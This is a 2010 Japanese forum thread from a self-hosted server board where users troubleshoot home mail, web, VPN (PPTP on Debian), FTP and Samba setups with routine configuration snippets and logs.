DNSを疑う前にこれくらい試してみれ
ほんとにそうなのかもしれないけれど
なるほど既視感を感じたのはその所為か。
>>685 ちゃんと読みなさい。
>メールソフトの設定を、@T COM(アットティーコム)が提供している
>メール送信サーバに変更していただくことで
>これまで同様メールの送信が可能になります。
>メールソフトの設定を
>メールソフトの設定を
>メールソフトの設定を
>メールソフトの設定を
>メールソフトの設定を
メールソフトも鯖も同じSMTP使って送信するんだから同じだよ・・・
はい先生。 ISPがOP25B用にわざわざ中継用のSMTPを用意するのはどういうわけですか?
694 :
DNS未登録さん :2010/07/20(火) 23:30:34 ID:Oul5teEe
>>693 そういうプロバイダはあんまり無いんじゃないかなぁ。
メールサーバの反応を見て、設定が推定できる人は使えちゃうとかなら
あるだろうけど。
ちなみに私の場合は中継サーバ兼バックアップMXとしてさくらを借りた。
別サーバの提供はbiglobeとかPlalaとかがやってるみたいだな
そのためにわざわざサーバ用意してくれてるんだけどな ん?つーことは中継サーバ用意するISPはその手の会員が多いと思っていいんだろうか
698 :
DNS未登録さん :2010/07/22(木) 12:17:36 ID:ARmrKgS8
自作サーバでXOOPSを動かすと、500エラーが出ます サーバーはwindows server 2008 R2で、サーバーソフトはIISです。 PHPのステータスを表示するinfo.phpは正常に動きます。
それだけじゃわからねーよ
まてまて、まだ彼は何も質問していない
704 :
DNS未登録さん :2010/07/23(金) 05:04:17 ID:9b3fZN8k
>>688 レスが遅くなり、すみません。
どうやらDNSもSSHも全く関係ないみたいで。
実は、ルーターからさらに1台ルーターをおいていて(全く関係ないと思っていて省略していました・・・)
ここで問題が起きているようで…。ちなみにルーターはハブモードにしているので、影響を考えてもいませんでした。
フレッツ用ルーター(192.168.1.1)---+----サーバー用ノートPC(CentOS5)(192.168.1.2、ホスト名example.com)
|
|---+-------デスクトップPC(WindowsXP)(192.168.1.3)
|
+---ルーター(ハブモード)--無線子機(192.168.1.30)--家電(192.168.1.33)
で、アドバイスにあったpingのチェックをしていたのですが、
最初はサーバー用ノートPCへのpingが正常に飛んでいるのに、一度 192.168.1.30や192.168.1.33のほうに
pingを飛ばすと、その直後からサーバー用ノートPCへのpingが飛ばなくなります。
pingテストをする際に、デスクトップ用PCのノートンで、セキュリティマップを確認しながらやっていると
なぜかサーバー用ノートPCのIPが最初は192.168.1.2で表示されているのに
192.168.1.30や192.168.1.33にpingを飛ばした直後に192.168.1.30や192.168.1.33にIPアドレスがコロコロ変わってしまうのです。
IPが変わっているので当然SSHも切断されていたようで。
ちなみにルーターへの回線を外すとサーバー用ノートPCのIPは正常になり、切断されることもありません。
なぜこんな風な挙動をするのかさっぱりわからず途方に暮れております。
705 :
DNS未登録さん :2010/07/23(金) 07:17:06 ID:BoHiZbo6
1.CentOS 5.4 2.使用するサーバソフト。いろいろ使用。samba,apache,メールサーバとかも。。 3.Linux1台のみルータとフレッツ光100M サーバを稼動させて数日するとPINGを返さなくなります。 何ででしょうか? オンボードのLANが不安定なのかと思いLANボード増設したんですが,やはり数日でPINGを返さなくなります。 アドバイスお願いします。 m(_ _)m
ルーターのログ確認
ルータのログ確認してみたら数行しか無かったです。 時刻も数年ずれていたので修正したらそのログも消えてしまいました。 特に参考になるようなエラーは無いようでした。 XPも繋いでNET使用したり作業しているので,ルータ自体は安定していて正常なようです。 熱暴走でしょうか,,,,, 室温自体結構高い(除湿機の影響で数度高い)ので,冷やす必要があるんでしょうか。 自宅サーバ初めて最初の夏なんで冷却しない影響についてはちょっと良く分かって無いです。 Linuxサーバもネットワークが落ちてるだけで,他は正常なようです。 この調子だと増設したLANボードもそのうち動かなくなってしまう気がします。 「温度が高くなると寿命が著しく縮む」とか他スレ読んでると書いて有りますが。。
一旦サーバ全部止めて数日放置してみたら? あと熱を気にするならそのへんもやってみれとしか
>>704 DHCP回りが悪さしてるっぽい挙動だな
本当にくだらないんだけど、 知り合いが、自作httpdを公開すると抜かしています。 というか「アクセスしてみて」と言って来たので、もうモノ自体は作ってしまったようです。 技術的な問題というよりは、人間関係的な問題ですが どうすればいいのか・・
好きにさせれば
>>707 サーバーなのかそれ以外なのか切り分けろよ。
LANの他のPCから鯖を見てどうなのか。
鯖のコンソールは操作できるんだろ。そこから操作するとか。
それと時刻設定した程度でおかしくなるルータなんて鯖立には向かない。
どこの使ってるか知らんけどメルコとかじゃないまともなの使えよ
>>711 いやどう考えたってまずいでしょ
web公開したいならapacheやIISがあるのに
なぜわざわざ作るのか
セキュリティ的にどうだか分からないものを
簡単に公開してよいのか
最悪、殴ってでも止めなきゃいかんだろうとは思うけど
一応知り合いでもあるし、利益になる方向で止めたいんだけど
こんな特殊な事例、どうすればいいんだか・・・
>>713 独自にwebサーバ機能を持っているパッケージは結構存在している
先にセキュリティについてどれだけ考慮してるか聞けよ
> セキュリティ的にどうだか分からない それを言って聞き入れなければ好きにやらせれ 穴だらけならすぐにズタボロにされるだろうし、そうなりゃ諦めるだろ
716 :
DNS未登録さん :2010/07/24(土) 15:00:02 ID:pUXNhsrG
XAMPPスレが過疎ってるのでこちらで質問します。 なぜかサーバのREMOTE_ADDRが「::1 」になっています。 でも、コマンドプロンプトでは198.168.〜ですし、127.0.0.1でもアクセスできます。 原因が分かる人いないでしょうか? WindowsXPにXAMPP1.7.3をインストールしています。
>>713 なんでそうまでして止めたいのかがわからん。
特権階級がないとサーバプログラム組んだらいけないってことはないし。
どう考えてもまずいのは >713 の頭だね常考w
>>716 IPv6での::1はIPv4の127.0.0.1と同様
IPv6切ればいいんじゃないかね
あー127.0.0.1は127.0.0.0/8に置き換えてくれ ループバックアドレスって意味で同様ってことね
>>719-720 XAMPPのコントロールパネルのSetupで切り替えられえるようです。
原因が分かって良かったです。ありがとうございます。
>>718 だよな。
そう言う奴が何人もいてくれるから、
今あるアパチなりのhttpdが高いセキュリティを維持してるわけで。
DiCE対応のDDNS鯖立てたんだが。 ここで晒せばテストしてもらえる? 一応継続してサービス提供するつもり。 UPS,RAID1はあっても商用ってわけじゃないから攻撃されると困るかもしれないけど。 無料でSPF,DKIMとフルドメイン対応してる。 需要あるかな?
mydnsで間に合ってる
>>723 DDNSの選択肢が増えるのはいいことだと思う
まあ、やってみれ
>>723 DKIM対応はありがたいかも。
DNSはミッションクリティカルだし固定IP必要だしで手が出なかったところだから。
実家にファイルサーバー作って家出たいんだけど 2,3年くらいメンテナンスしなくても稼働させるにはOSは何がオススメ?
>>728 金はかけようと思う
冷却性能良くして
HDD沢山積んでRAIDで組もうかなと思ってる
>>729 いきなりフリーズするOSなんて今日日無いので、なんでもいいんじゃね?
俺はシェルスクリプトで色々仕組み作りたいからDebianだけど。
>>730 つける!
>>731 あんまり気にしないでいいのか、ならとっつきやすそうな
Windows server 2008でいくよ、ありがとう
どれだけ金を掛けようが、神経使おうが、壊れる時はあっさり壊れる。 RAIDとか無関係。なので3年間メンテフリーていうのはよほど幸運が重ならな いと無理。 まあ、ホットスワップベイのHDDの交換くらいなら電話越しに家族にやっても らう、とか出来るなら3年間一切(自分は)触らないとか可能かもね。 ちなみにwindowsServer2k3r2eeとFreeBSDで鯖組んでるけど、安定度で言えば どっちも変わらず安定してるよ。無論、安定性重視で余計なソフトは極力入れ ないようにしてるけど。
>734 ゆとり乙
夏休みに入った学生さんかなw
>>736 やめとけ。なんちゃって識者はすぐ人を小馬鹿にしたがる性質があるらしいぞ。
自分しか使わないような頻度ならシンプルな構成であれば 持つ時は持つけど、外からメンテしやすいUnix系がいいと思う WinでもVPNつないでターミナルサーバでできないことは無いけど・・・
ルータ機器やらDDNSやらの不具合頻度 >> kernel panic頻度 だな。ここ数年の経験では。
俺ならおとなしくDropBoxにしとく。金かけるならそっちのほうが安くて確実だろう。
>>723 もし可能なら設定とかうpしてほしいなぁ。
他のところを使ったサービスの設定方法を解説したサイトはあるけど、
自前で構築するってのはなかなか見つからないし、
あったとしても情報が古かったりするんだよね。
>729 金あるならどっかの有料のオンラインストレージでいいやん
いや、目的と手段ひっくり返りすぎw
CentOS5.5でApache2.2.3を利用しているのですが、Apache Server Statusを見たところプロセス数の最大が10になっています。 KKWKKKKKKK と言った具合です。 これでは足りないので増やしたいのですが、どこを設定するればいいのでしょうか httpd.confでは以下のように設定しています <IfModule prefork.c> StartServers 5 MinSpareServers 5 MaxSpareServers 12 ServerLimit 256 MaxClients 256 MaxRequestsPerChild 8000 </IfModule>
>>729 金があるなら、メンテナンスのためだけに、サーバ管理者を雇えば良いかもね。
750 :
723 :2010/07/29(木) 00:14:54 ID:???
754 :
DNS未登録さん :2010/07/30(金) 16:04:16 ID:dd5O730G
今なら吉野家で牛丼全品110円引きなんですよ!! なので、軽盛なんかだと \190 で買えてしまうんです! \190 ですよ!100円硬貨2枚でおつりが来るとか、もはやハヤブサもびっ くりの宇宙規模サプライズですよ! しかしここで驚いちゃぁいけません! なんと、サイドメニュー \50引き券まで付いてくるんです!! って事は、実質価格で \140 !? 缶コーヒー1本の価格より安いとか、もうサプライズとか驚きとか言ってる場合じゃない でしょう!!牛丼ビッグバン?人類総吉野家宣言?あまりの安さに気が狂いそうですよ!!!!
ubuntu10.04のサーバー機にapacheでwebサーバを立てて、配布されてるphpで 画像アップローダを作ったところ、サーバー機からだとサイトの反応が早いですが、 windowsのメイン機からアクセスするとアップロードなどの反応が遅く、 その原因がわからず困っています。 ・メイン機からだと反応は遅いですが、アップロードや削除はできます。 ・メイン機でもサイトの表示は遅くないです。 ・回線は光で、速度は上り15Mbps、下りは30Mbpsぐらいです。 ・レンタルサーバに同じphpでアップローダを作った時は遅くありませんでした。 ・串を刺すとサーバー機でも遅いです。 ・サーバー機とメイン機でアクセスしたときのアクセスログ・エラーログに違いはありませんでした。 ・ポート開放、外部からのアクセスはできています。 ・公開ディレクトリ、ファイルのパーミションをすべて777にしてみましたが、だめでした。 ・メイン機とCTUのファイアウォール、ウィルス対策ソフトを切っても改善しませんでした。 どうすればメイン機からのアクセスが早くなるでしょうか?よろしくお願いします。
>>756 ApacheかCGIで逆引きやってる & LAN上のWindows機のIPアドレスを逆引きできない。
760 :
DNS未登録さん :2010/08/01(日) 11:18:35 ID:H0fSmsgb
当方 Debian lenny + samba でファイル鯖もどきを構築したものです。 ローカルからはクライアント win 機で ネットワークドライブを割り当てられたんですけど 外出先からは割り当てが出来ませんでした。 どんな設定すればいいのでしょうか
>>760 VPN。CIFSはネットに出られない。
762 :
DNS未登録さん :2010/08/01(日) 13:04:25 ID:H0fSmsgb
>>761 貴重な情報d(゚Д゚ )☆スペシャルサンクス☆( ゚Д゚)b
じゃあdebianにVPN鯖兼用させて
クライアントPC(win機)にもVPN接続できるような
設定すればおk?
ダウト 設定さえすればC1FSでも外からつなげられる。
>>763 C1FSってなんだ?邪魔したいだけかよ。
765 :
DNS未登録さん :2010/08/01(日) 13:44:48 ID:H0fSmsgb
>>763 んん?
なんだか難しい話になってきたね・・・
ちなみにVPNの接続はiPadからは確認できますた。
だが、クライアントwin機からは接続できませぬ。
「エラー 619:リモート コンピュータへの接続を確立できなかったので、
この接続に使われたポートは閉じています。・・・・(ry」
って出るんだが・・・・
これってクライアント側のルータの問題?
>>764 CIFSのタイポミスだろ常考
>>760 samba(CIFS)でもきちんと設定すれば外からでも共有出来る。現に、うちの会
社で使ってるファイル鯖(CentOSだけど)は、社内からでも社外からでもファ
イルが取り出せるように設定されてる。
もし間にルーターがかまされてるならルーターの設定を疑うべき。
768 :
DNS未登録さん :2010/08/01(日) 14:01:39 ID:H0fSmsgb
>>767 おせっかいフィルターかどうか
問題の切り分けってどうすればいい?
ちなみにクライアント側のルータは BUFFALO WHR-G で
モデムはYahooからの支給品らしいんだよね。
ちなみに俺の鯖はポート1723が開いていることを確認。
emobile回線を使ってiPadからこの鯖にVPN接続できることを確認した。
770 :
DNS未登録さん :2010/08/01(日) 14:12:28 ID:H0fSmsgb
>>769 見たところBAFFALOのルータは
ipV6関係のチェックボックスとIPsec関係のものしかなかった。
今使ってるのはIPv4だから関係はないだろうけど一応オンにはしたけど
まあルータ疑うなら直結で試してみるのも手かも
772 :
DNS未登録さん :2010/08/01(日) 14:18:12 ID:H0fSmsgb
>>771 それができたら(泣)
相手が遠方にいるので設定を見にはいけませぬ・・・
だれかYahooBBと契約してるひといない?
ログはどうなってんの、届いてないの? そもそもクライアントは何使ってんの
774 :
DNS未登録さん :2010/08/01(日) 14:27:48 ID:H0fSmsgb
>>773 クライアントはwindowsXPです。
サーバ側のログは
Aug 1 14:27:47 hoge pptpd[26605]: CTRL: Client 221.23.42.109 control connection started
Aug 1 14:27:47 hoge pptpd[26605]: CTRL: Starting call (launching pppd, opening GRE)
Aug 1 14:27:47 hoge pppd[26606]: Plugin /usr/lib/pptpd/pptpd-logwtmp.so loaded.
Aug 1 14:27:47 hoge pppd[26606]: pppd 2.4.4 started by root, uid 0
Aug 1 14:27:47 hoge pppd[26606]: Using interface ppp0
Aug 1 14:27:47 hoge pppd[26606]: Connect: ppp0 <--> /dev/pts/3
Aug 1 14:27:47 hoge pptpd[26605]: GRE: Bad checksum from pppd.
ってな感じです。
あとサーバの置いてあるLAN内にはWin機は無いの? それでつながるかやってみては
776 :
DNS未登録さん :2010/08/01(日) 14:34:57 ID:H0fSmsgb
778 :
DNS未登録さん :2010/08/01(日) 14:53:40 ID:H0fSmsgb
>>775 LAN内からだだとwin vistaではVPN接続できなかった。
ちなみにemobile回線を使った場合(つまり外部回線)
一応VPN接続は確立できたが、限定的な接続のみになって
インターネット等作業が出来ないという問題が発生。
中からダメならiptablesとか 外からダメならGRE通してないとか
780 :
DNS未登録さん :2010/08/01(日) 15:06:28 ID:H0fSmsgb
>>779 一応 iptable で通したはず。
やった内容は
iptables -A INPUT -p tcp --dport 1723 -j ACCEPT
iptables -A INPUT -p 47 -j ACCEPT
なんだが・・・まだなんかたりないのかな
ああごめん、外から47はルータの話ね。 とりあえず中からのやつどうにかしないと切り分けできないかな。 認証と通信のどちらかあるいは両方か
782 :
DNS未登録さん :2010/08/01(日) 18:57:27 ID:H0fSmsgb
>>781 中からVPN認証とおるんだけど今度は外に出れない・・・
783 :
DNS未登録さん :2010/08/02(月) 00:36:11 ID:iIQOUpqP
>>781 vpnいけました!!!
原因はやっぱりクライアント側のルータだった。
pptpバススルーの項目が無いから変だなと思って
メーカのページ探してたらファームウェアでpptpに対応とかw
ファームウェアうpしたらあっさりつながったw
VPNって便利だなw
初めてR2でウェブ鯖立てました、皆さんセキュリティは何入れてますか? PG2とか入れたほうがいいんですかね
2008R2?2003R2? 昔、自宅でWindowsServer2003 R2 EnterpriseEdition VL版を使ってた事がある けど、大抵のセキュリティーは入らなかったような。
申し訳ないです2008です、サーバー立てるの初めてではないんですが以前はWin7でxampp入れてセキュリティ無しで立てて遊んでたんですが 最近本格的に立てなきゃいけなくなったので2008R2の体験版入れてやってるのですがやはりサーバー専用OSだとその辺は優秀なんですかね
サーバはその辺全部自分でやるんだよw
DirectoryIndexにはちゃんとindex.htmlが記載されているのですが何故勝手にxamppがつくんでしょうか
すみません解決しました 原因はDirectoryIndexを見た時index.phpが先頭にあった為こうなってしまったようです index.htmlを最初に記載してやったら直りました、有難う御座いました
xamppなんて鯖じゃない、ただの開発環境だ。 あんなもんで「鯖立て経験有ります(キリッ」「自宅鯖立てます(キリリ」とか勘弁してくれ。 もはや板違いだ。
>>793 実行環境だろJK。
xamppにはエディタないしな。
1.OS名 サーバ:WinXPSP3 サーバ2:LinkStation(詳細不明) クライアント:WinXPSP2 2.使用するサーバソフトとバージョン サーバ:cygwin+OpenSSH(?)1.81(?) クライアント:PuTTY0.60+Windowsファイル共有 3.ネットワーク環境 サーバ及びサーバ2が同一ネットワーク上でSMB共有状態 クライアントは別ネットワーク 外出先からSSHのトンネルを利用したSMB共有を実現しようと考えています。 現在、別ネットワークからのSSHでの接続はできているのですが、 (cygwinコンソールが通常通り操作できています。) トンネル機能を思ったとおり使えておりません。 クライアント側では LoopbackAdapter の追加をし、IPを割り当て、 PuTTYにて139番ポートをトンネルする設定にしています。 サーバ側では ssh_config の Tunnel を yes にし、 TunnelDevice を any:any にしました。 また、 sshd_config の PermitTunnel を yes にしています。 サーバ側の設定はこれで問題ないのでしょうか? ネットで調べると、 Tunnel 及び PermitTunnel には yes の他に point-to-point や ethernet が指定できるようですが、 これらはそれぞれどういう意味なのでしょうか?
>>796 申し訳御座いませんお客様、そのような高度な質問に答えられる者はこのスレにはおりません。
sshd のこのトンネル機能って、VPN 環境を作るためのものだよ。 sshd の設定だけじゃなくて OS 側もいろいろいじらないと動かないし、 クライアント側にも特殊な機能が必要だよ。putty がどうだか知らんけど やりたいのって、そうじゃなくて単純なポートフォワーディングなんじゃないの?
DNSサーバーっていうのは立てると自分でドメイン設定できるってことなんでしょうか? 代行業者でドメインとろうか迷ってたのですがもしそうなら勉強して立てようと思うのですが
>>799 業者経由でドメインを取得すれば、そのドメイン以下のサブドメインやホスト名は
自由に設定できる。
すんまそん、VPNについて質問です 鯖: debian Lenny ミドル: pptpd クライアント: winXP, iPhone でクライアントで外部回線を使ってVPN接続出来たんですけど、全くネットワークが繋がりません。 どうしたものでしょうか?
>>801 IPアドレスは取得できてるけど通信が全くできないならiptables
IPアドレスすら取得できていないのであればpptpの設定
803 :
DNS未登録さん :2010/08/13(金) 18:17:37 ID:3j0Pi6uo
>>802 おおおお、あなたが神か。。。。
てかIPアドレスは取れてるわ。。。
iptableの設定ってポート開けてGREを47設定するとか?
後はvpnってこんなにも通信遅いもん?
あとip_fowardもあったのでそっちも確認してみてちょ 遅いってどのくらい? 環境にも依存するけど20Mbpsくらいならそんなもんかな
805 :
DNS未登録さん :2010/08/13(金) 18:55:02 ID:3j0Pi6uo
>>804 神よ、ありがとう
フォーワードも一応設定済みっす
サーバのフォルダにある写真を開くのかおっくうになるくらい
Kbpsレベルだと思う。
携帯かってツッコミ入れたくなるww
ちなみに鯖回線は光っす
んじゃやっぱiptablesかね。 接続自体は出来てるからGRE周りじゃないよ。 接続先鯖のリソースしか見れなくて接続先の内部ネットワークがNGなら 接続後のpppインターフェースと内部LANとのiptables。 接続後のネットができないのであれば、 接続後のpppインターフェースと外部インターフェースのiptablesだと思う。 極端に速度が下がってるならMTU周りを疑ってみるといいかも。 速度重視ならut-vpnやpacketixを勧めるけど、iPhone用のクライアントないからなぁ。
あぁごめん、書き方がややこしかった。TCP1723とGREは許可しておいてね。 これから仕事で出ちゃうので他の可能性をピックアップしておくよ。 ip_forwardができていれば 内部ネットワークとVPNネットワーク間のiptablesが原因とは思うけど、 稀にルーティングテーブルを書いてあげないと通信ができない場合がある。 ないとは思うけど接続先リソース側で接続元アドレスの制限をかけてたら(#^ω^)
ファイルサーバーって今でも作ったら仕事になるかな 需要あるならやってみたいが
超とーしろな私がwinserver 2008 R2 でFTPサーバーを構築したいのですがどこ見てもやり方がのっていません 皆さんどこで勉強してるのでしょうか?書籍がいいですかね?
>>810 ぐぐれば沢山出るけど、お前の目は節穴か?
>>811 探したんだけど見つからなかったです
初心者でもわかるサイトありましたか?あったら教えて頂けませんか?
FTPのAnonymousのリスクってなんでしょうか?
Anonymousでフォルダを重要で無いところに作って書き込み読み込みを有効、 削除を無効にして、なおかつホームルートよりも上の階層に行けない状態でのリスクです
818 :
DNS未登録さん :2010/08/14(土) 11:26:11 ID:bQOFDAwY
>>802 神様、お仕事終わりましたか
まだ問題解決してなくて、なんだかIPアドレスやはり正しくふれてなかった見たいです
不思議なのが外部から共有フォルダに接続出来たことなんですが
>>817 誰かと喧嘩してんの?
素直に謝っとけ。時間の無駄。
ようやくhibari復旧したか。
仕事では大手サイト運用してるけど
こういうの見てるとイマイチSSDに踏ん張りつかないんだよな。
>>818 もう設定&ログうpした方が早いんじゃないかな
821 :
818 :2010/08/14(土) 20:25:57 ID:FkgQp2RC
>>820 ですよね。。。。
ちなみにIPはちゃんとふれてました。
問題はVPNの驚異的な遅さなんですよ。
具体的にどこの設定おみせすればいいですか?
>>821 818を見る限りじゃ、「アドレス振られない・何故か共有リソースみれちゃう」のようだけど、
現状は「アドレス割り当てられてる・共有リソースおk」でいいのかな?
821の内容の認識で合ってるのなら現状VPN接続はできているだろうから、
MTU周りになってくると思うけど
自分もその辺は専門外なので解説サイトを参考にされたし
823 :
DNS未登録さん :2010/08/15(日) 16:03:44 ID:+/x0ySon
>>822 MTU関係か。。。。。。
どうしたもんだろ
MTU怪しかったらとりあえず小さくして少しずつ戻してみ
825 :
818 :2010/08/16(月) 22:33:11 ID:0zP0H4yW
>>824 すまね・・・どこをどう設定していいか皆目検討つかね。。。
/etc/ppp/options にMTUの設定あるんだが。。。
変えても全然かわらんなぁ。
調べた結果1454が一番いいらしいが・・・
クライアントからはかわらねーよ!って文句言われるし
826 :
818 :2010/08/16(月) 23:21:03 ID:0zP0H4yW
新しいトラブルが発覚した! なんとリソースへのアクセス速度が遅いだけでなく 普通にインターネットするときの速度も低下しているとのこと。 これもやっぱMTUの問題なの?
>>826 MTUってTCPの話だから、そらそうでしょう。
うちはケーブルテレビで160MコースだけどMTU1500で下り50M位MTU7000で100ちょいでる
829 :
818 :2010/08/16(月) 23:34:15 ID:0zP0H4yW
>>827 やっぱりそうか・・・
ちなみにどっちの問題なんだろ?
鯖?クライアント?ルータ?
830 :
818 :2010/08/16(月) 23:48:17 ID:0zP0H4yW
syslog 見てみたらこんなログが残ってますた。 Aug 16 22:47:58 hoge pptpd[9749]: CTRL: Client (クライアントIP) control connection started Aug 16 22:47:58 hoge pptpd[9749]: CTRL: Starting call (launching pppd, opening GRE) Aug 16 22:47:58 hoge pppd[9750]: Plugin /usr/lib/pptpd/pptpd-logwtmp.so loaded. Aug 16 22:47:58 hoge pppd[9750]: pppd 2.4.4 started by root, uid 0 Aug 16 22:47:58 hoge pppd[9750]: Using interface ppp0 Aug 16 22:47:58 hoge pppd[9750]: Connect: ppp0 <--> /dev/pts/1 Aug 16 22:47:58 hoge pptpd[9749]: GRE: Bad checksum from pppd. Aug 16 22:48:01 hoge pptpd[9749]: CTRL: Ignored a SET LINK INFO packet with real ACCMs! Aug 16 22:48:01 hoge pppd[9750]: MPPE 128-bit stateless compression enabled Aug 16 22:48:03 hoge pppd[9750]: found interface eth0 for proxy arp Aug 16 22:48:03 hoge pppd[9750]: local IP address 192.168.1.100 Aug 16 22:48:03 hoge pppd[9750]: remote IP address 192.168.1.101 Aug 16 22:50:01 hoge /USR/SBIN/CRON[9766]: (root) CMD (if [ -x /usr/bin/mrtg ] && [ -r /etc/mrtg.cfg ]; then env LANG=C /usr/bin/mrtg /etc/mrtg. cfg 2>&1 | tee -a /var/log/mrtg/mrtg.log ; fi) Aug 16 22:51:08 hoge pppd[9750]: LCP terminated by peer (^[ +M-^X^@<M-Mt^@^@^@^@) Aug 16 22:51:08 hoge pppd[9750]: Connect time 3.1 minutes. Aug 16 22:51:08 hoge pppd[9750]: Sent 22167504 bytes, received 3548673 bytes. Aug 16 22:51:11 hoge pppd[9750]: Connection terminated. Aug 16 22:51:11 hoge pppd[9750]: Modem hangup Aug 16 22:51:11 hoge pppd[9750]: Exit. もしかしてGRE関係でなんか悪さ起きてる? でもVPNは開通してるんだけど、モデムがハングアップしてるね
>>830 あてずっぽだがip_nat_pptpとかは読み込まれてる?
よく携帯でフリーメールを取得できるサービスがありますがあれはどうやってるんでしょうか? メールサーバーを構築するのはわかりますがその後の公開手順が検討もつかないのですがどうやってるんですかね?
うちは100人の日本人スタッフで10リクエスト/minを捌いてるよ。
自動でメアド作るスクリプト書いたらほぼ終わりだろう・・
リダイレクトさせたいの? Apacheならmod_rewrite使った方が応用効いていいと思うが。
>>836 例としてURI出すなら、hogeとかfooとかaaとかの適当な文字列じゃなくて
例示専用ドメインのexample.comとかexample.jpを使うように心がけたほうが良いぞ
・・・ 疲れました orz (某エディタの"改行はシフト+エンター"が染み付いてて、それをすると投稿になってしまう)
シンボリックリンクでもいい気がするNe!
845 :
818 :2010/08/17(火) 23:06:21 ID:sgKuNez/
VPNは・・・・兄じゃ
↑なんでIDでてるの?
名前か
848 :
DNS未登録さん :2010/08/18(水) 07:25:43 ID:Ko68/YU5
sageてないから
age
850 :
DNS未登録さん :2010/08/19(木) 00:57:20 ID:uYNkPrtH
VPNの解決方法ないっつかね
まだやってたのか MTU大きすぎると遅くなるよ小さい数値からやれ
852 :
DNS未登録さん :2010/08/19(木) 23:56:03 ID:uYNkPrtH
don't fragment 指定した ping が通る範囲で 一番大きい値にしてるけどな。 VPNでのMTU。
まだやってんのか それくらいgoogleで調べればすぐわかる事だし、 debian lenny使いのやつはqmailのやつといい ロクでもないやつしかおらんっていうイメージが定着するぞ
xamppとかlampって単語を最近まで知らなかった。 xyzzyみたいにそう言うソフトがあるもんだと思ってた。
開発者じゃなければ知らんでもいいだろ。
でも個々は全部使ってたり。
xamppはppなのに、なぜlampはlamppじゃないんだろう。 つーかlampなんつー単語のせいで肩身の狭いbamp(famp?)
XAMPPはパッケージでLAMPは総称 LAMPPがマルチプラットフォームになったからxAMPP(XAMPP)になった
そういう考え方の人が少なくないって言ってるんじゃ?
ゆとり乙とまでは言わないけど、 聞く側も少しは調べてみるべきって856は言いたいのでは? 先の話でもmtu vpnやmtu ping等、 今まで出てきたキーワードでぐぐれば必要な情報にたどり着くだろうからね。
windows7 32bit
nekosogiftpd 2.07
の環境で
ルータ、ファイアウォールポート21番開放済み
ファイアウォールftpサーバー例外扱い済み
(LAN側固定IP払い出し済み)
鯖機からの
ftp://127.0.0.1でのアクセス →可
鯖機からの
ftp:// (グローバルIP)でのアクセス→時間切れ
どこかまだ確認できてないところがあるのでしょうか?
867 :
866 :2010/08/23(月) 13:38:41 ID:???
追記 ローカルIPは固定済み
>>866 FAQ FTPDに外部から接続できない
は試したの?
>>865 MTUぐらいはあっさり出て来るけど、
最近はググるのも高いリテラシが必要になってきたぞ。
最近のGoogleはキーワードうまく選ばないと糞みたいな結果しか出さない。
勝手にキーワードを分割・結合・補正する最近のGoogleには閉口する。
ググっても見つけられない奴は今後増加すると思う。
ftp以前にpingとか試してみるべきだな 外から確認する手段無いのかな
内側からグローバルIPで接続できないのなんてよくある初心者の質問だろ 100回は聞いたぞ
まあ
>>1 にもリンクがあるくらいだからね。
でも今回の質問者は、外部からはピコーン〜も確定してないので何とも・・・
ftpは単一のポートフォワードだけじゃ解決しないのと アクティブやらパッシブやら方式も複数あるから 別プロトコルで一通り問題ないことを確認してから 調べたほうがいいよ。 まあたいていはルーターが何とかしてくれてるけれども。
876 :
866 :2010/08/23(月) 19:27:27 ID:???
結局、ルータか。
ヘアピンって造語というかメーカ独自仕様なのかと思ってたら、RFCで定義されてたのな。 ググって初めて知った。 rfc4787
879 :
DNS未登録さん :2010/08/24(火) 00:51:13 ID:f9wi/Pec
>869 ""使え
>>879 甘いぞ。
""を使っても検索結果の4つ目ぐらいから勝手に分割される。
""使って素直に出て来るなら嘆いたりしないよ。
881 :
なし :2010/08/24(火) 07:13:37 ID:???
あげてすみません、VPSの質問ですがここではダメでしょうか?
VPSが自宅にあるというわけではなさそう
どうしてこの板って自宅サーバ限定なんだろうな。 apacheのスレってここ以外ないよね。まぁ、あっても人来るかどうかあやしいけど。
この板が自宅サーバ板だから自宅サーバ限定なんだろうよ
unixサーバでも関連スレあるとは思うが、 あそこはみんな自力で解決しちゃうんじゃ?
VPS特有の質問じゃなければ問題ないだろ
>>889 この板「にしかapacheスレがない」よね? って質問だと思うけど
892 :
DNS未登録さん :2010/08/28(土) 00:42:46 ID:NvR9oQTb
自宅鯖を公開するようになったら(一応身内+αだけなんだが)バッファローのルータがちょくちょくこけるようになった。 単にインターリンクが調子悪いだけの可能性もあるかもしれないが・・。 問題切り分けのためにもルータを買い換えようと思う。 「これをかっときゃ100万PV行こうがうpろだつくろうが5年はへっちゃらだぜ!」的なルータを教えてください。 予算は上限5万くらいでたのむ。
今すぐでなくていいならもうすぐYAMAHAからなんか出るけど
今すぐでなくていいならもうすぐNECからなんか出るけど
機種名も教えてくれんとわかりません・・・ YAMAHAはRTなんちゃらの3万くらいのでおk?
fit-pc2i買ってルータ化すれば?
>>896 問題切り分けが目的の一つなのでそういうマニアックなのは・・そそられはしますが。
>>897 ありがとう。でもルータは枯れてる古いのでもおkってじっちゃが言ってた。
明日音楽教室行ってYAMAHA買ってくるわ。
無線LANで鯖稼働してる人っている?
>>899 ローカル鯖なら無線で動いてるものはある。
出来るだけ有線で引いてるけど、どうしても引けない部分は無線。
物理制限にはなかなか勝てないからさ。
901 :
DNS未登録さん :2010/08/28(土) 22:15:43 ID:+WMPq3GV
>892 鯖とルーター兼用したらいいねん。 うちはそうしてる
>>899 イーサネットコンバータ付けてる俺が来ましたよ。
つっても内部専用だし、イサコンにはPCも繋がってるからなんともいえないかもな
squidでaccess.logでGET引数(?の右側)を記録する方法を教えてくれさい。
>>894 で、そろそろ何が出るのか教えてくれないか
>>904 # TAG: strip_query_terms
# By default, Squid strips query terms from requested URLs before
# logging. This protects your user's privacy.
#
#Default:
# strip_query_terms on
グローバルIP1 ルータ グローバルIP2 サーバ グローバルIP3 IPマスカレード用 という感じでグローバルIPを割り当てているのですが (恐らく)グローバルIP3が逆引きできないという理由で BBQされてしまってに2chに書き込みできなくなりました。 IP3はIPマスカレード用で使っているのでDNSで何も 設定してないのですが、こういう場合、適等にホスト名でっち上げて 正引き、逆引きの設定をしてしまってもいいものでしょうか?
うむ
910 :
DNS未登録さん :2010/09/03(金) 15:39:49 ID:QLaX6PH5
XPであるユーザにだけSMB/CIFSによるログインだけを許可して、 リモート・ローカルログイン、その他サービスの利用の禁止を、 CIFS、RDPを止めずに出来る?
>>913 リモートデスクトップは許可・不許可あるっしょ。
915 :
DNS未登録さん :2010/09/10(金) 21:45:28 ID:y/JAz2ui
tachikawa.mopera.netのIP範囲分かる方居ますか?
